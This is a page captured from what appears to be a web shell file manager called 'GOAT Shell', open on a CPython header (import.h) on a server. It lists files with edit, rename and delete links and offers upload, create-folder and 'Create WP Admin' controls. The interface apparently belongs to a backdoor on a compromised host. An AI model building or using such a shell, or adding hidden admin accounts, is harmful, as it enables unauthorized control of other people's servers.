🐐 GOAT Shell
Current path:
opt
/
alt
/
python310
/
include
/
python3.10
/
cpython
/
👤 Create WP Admin
⬆️
Go up: python3.10
✏️ Editing: import.h
#ifndef Py_CPYTHON_IMPORT_H # error "this header file must not be included directly" #endif PyMODINIT_FUNC PyInit__imp(void); PyAPI_FUNC(int) _PyImport_IsInitialized(PyInterpreterState *); PyAPI_FUNC(PyObject *) _PyImport_GetModuleId(struct _Py_Identifier *name); PyAPI_FUNC(int) _PyImport_SetModule(PyObject *name, PyObject *module); PyAPI_FUNC(int) _PyImport_SetModuleString(const char *name, PyObject* module); PyAPI_FUNC(void) _PyImport_AcquireLock(void); PyAPI_FUNC(int) _PyImport_ReleaseLock(void); /* Obsolete since 3.5, will be removed in 3.11. */ Py_DEPRECATED(3.10) PyAPI_FUNC(PyObject *) _PyImport_FindExtensionObject(PyObject *, PyObject *); PyAPI_FUNC(int) _PyImport_FixupBuiltin( PyObject *mod, const char *name, /* UTF-8 encoded string */ PyObject *modules ); PyAPI_FUNC(int) _PyImport_FixupExtensionObject(PyObject*, PyObject *, PyObject *, PyObject *); struct _inittab { const char *name; /* ASCII encoded string */ PyObject* (*initfunc)(void); }; PyAPI_DATA(struct _inittab *) PyImport_Inittab; PyAPI_FUNC(int) PyImport_ExtendInittab(struct _inittab *newtab); struct _frozen { const char *name; /* ASCII encoded string */ const unsigned char *code; int size; }; /* Embedding apps may change this pointer to point to their favorite collection of frozen modules: */ PyAPI_DATA(const struct _frozen *) PyImport_FrozenModules; PyAPI_DATA(PyObject *) _PyImport_GetModuleAttr(PyObject *, PyObject *); PyAPI_DATA(PyObject *) _PyImport_GetModuleAttrString(const char *, const char *);
Save
📄
abstract.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
bytearrayobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
bytesobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
ceval.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
code.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
compile.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
dictobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
fileobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
fileutils.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
frameobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
import.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
initconfig.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
interpreteridobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
listobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
methodobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
object.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
objimpl.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
odictobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
picklebufobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pyctype.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pydebug.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pyerrors.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pyfpe.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pylifecycle.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pymem.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pystate.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pythonrun.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
pytime.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
sysmodule.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
traceback.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
tupleobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
unicodeobject.h
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📤 Upload File
Upload
📁 Create Folder
Create Folder